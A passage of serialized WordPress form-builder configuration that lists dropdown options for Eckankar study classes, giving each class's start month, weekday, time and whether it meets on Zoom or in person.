class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:1;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:1;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:78:\"The ECK Dream 1 Discourses - STARTS IN NOVEMBER -- 3rd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:2;a:9:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"label\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 6:45 pm - Zoom\";s:5:\"value\";s:80:\"The ECK Dream 2 Discourses - STARTS IN NOVEMBER - 1st Thursday at 645 pm -  Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:3;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:4;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:5:\"value\";s:81:\"Letters of Light and Sound 1 - STARTS IN FEBRUARY -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:4;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:5;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:81:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 9:30 am - Florence - Hybrid\";s:5:\"value\";s:80:\"Soul Travel 1 - STARTS IN NOVEMBER -- 3rd Saturday at 930 am - Florence - Hybrid\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:5;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:6;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:67:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:66:\"Soul Travel 1 - STARTS IN NOVEMBER -- 2nd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:6;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:7;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:64:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 7:00 pm - Zoom\";s:5:\"value\";s:63:\"Soul Travel 1 - STARTS IN MARCH -- 3rd Tuesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:7;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:8;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:76:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:71:\"Soul Travel 2 - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:8;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:9;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:77:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 9:00 – 10:15 am - Zoom\";s:5:\"value\";s:72:\"The Secret Way - STARTS IN NOVEMBER -- 3rd Sunday at 900  1015 am - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:9;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:10;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:90:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 11:45 am – 1:00 pm - Zoom\";s:5:\"value\";s:85:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1145 am  100 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:10;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:11;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:87:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 12:00 – 1:30 pm - Zoom\";s:5:\"value\";s:82:\"The Precepts of Eckankar - STARTS IN NOVEMBER -- 1st Sunday at 1200  130 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:11;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:13;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  First Series - STARTS IN NOVEMBER -- 2nd Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:12;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:15;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:99:\"The ECK Satsang Discourses – Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 7:00 pm - Zoom\";s:5:\"value\";s:95:\"The ECK Satsang Discourses  Third Series - STARTS IN NOVEMBER -- 1st Wednesday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:13;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:16;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:97:\"The ECK Satsang Discourses – Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 7:00 pm - Zoom\";s:5:\"value\";s:93:\"The ECK Satsang Discourses  Fourth Series - STARTS IN DECEMBER -- 2nd Monday at 700 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:14;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:17;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:79:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 7:30 pm - Zoom\";s:5:\"value\";s:78:\"The Master 1 Discourses - STARTS IN NOVEMBER -- 2nd Wednesday at 730 pm - Zoom\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:12:\"settingModel\";a:10:{s:8:\"settings\";b:0;s:15:\"hide_merge_tags\";b:0;s:5:\"error\";b:0;s:4:\"name\";s:7:\"options\";s:4:\"type\";s:15:\"option-repeater\";s:5:\"label\";s:159:\"Options <a href=\"#\" class=\"nf-add-new\">Add New</a> <a href=\"#\" class=\"extra nf-open-import-tooltip\"><i class=\"fa fa-sign-in\" aria-hidden=\"true\"></i> Import</a>\";s:5:\"width\";s:4:\"full\";s:5:\"group\";s:0:\"\";s:5:\"value\";a:3:{i:0;a:5:{s:5:\"label\";s:3:\"One\";s:5:\"value\";s:3:\"one\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:0;}i:1;a:5:{s:5:\"label\";s:3:\"Two\";s:5:\"value\";s:3:\"two\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:1;}i:2;a:5:{s:5:\"label\";s:5:\"Three\";s:5:\"value\";s:5:\"three\";s:4:\"calc\";s:0:\"\";s:8:\"selected\";i:0;s:5:\"order\";i:2;}}s:7:\"columns\";a:4:{s:5:\"label\";a:2:{s:6:\"header\";s:5:\"Label\";s:7:\"default\";s:0:\"\";}s:5:\"value\";a:2:{s:6:\"header\";s:5:\"Value\";s:7:\"default\";s:0:\"\";}s:4:\"calc\";a:2:{s:6:\"header\";s:10:\"Calc Value\";s:7:\"default\";s:0:\"\";}s:8:\"selected\";a:2:{s:6:\"header\";s:45:\"<span class=\"dashicons dashicons-yes\"></span>\";s:7:\"default\";i:0;}}}s:12:\"manual_value\";b:1;}i:15;a:11:{s:6:\"errors\";a:0:{}s:11:\"max_options\";i:0;s:5:\"order\";i:19;s:3:\"new\";b:0;s:7:\"options\";a:0:{}s:5:\"label\";s:100:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 8:45 – 10:00 am - CO Temple - Hybrid\";s:5:\"value\";s:95:\"The Master 3 Discourses - STARTS IN NOVEMBER -- 2nd Sunday at 845  1000 am - CO Temple - 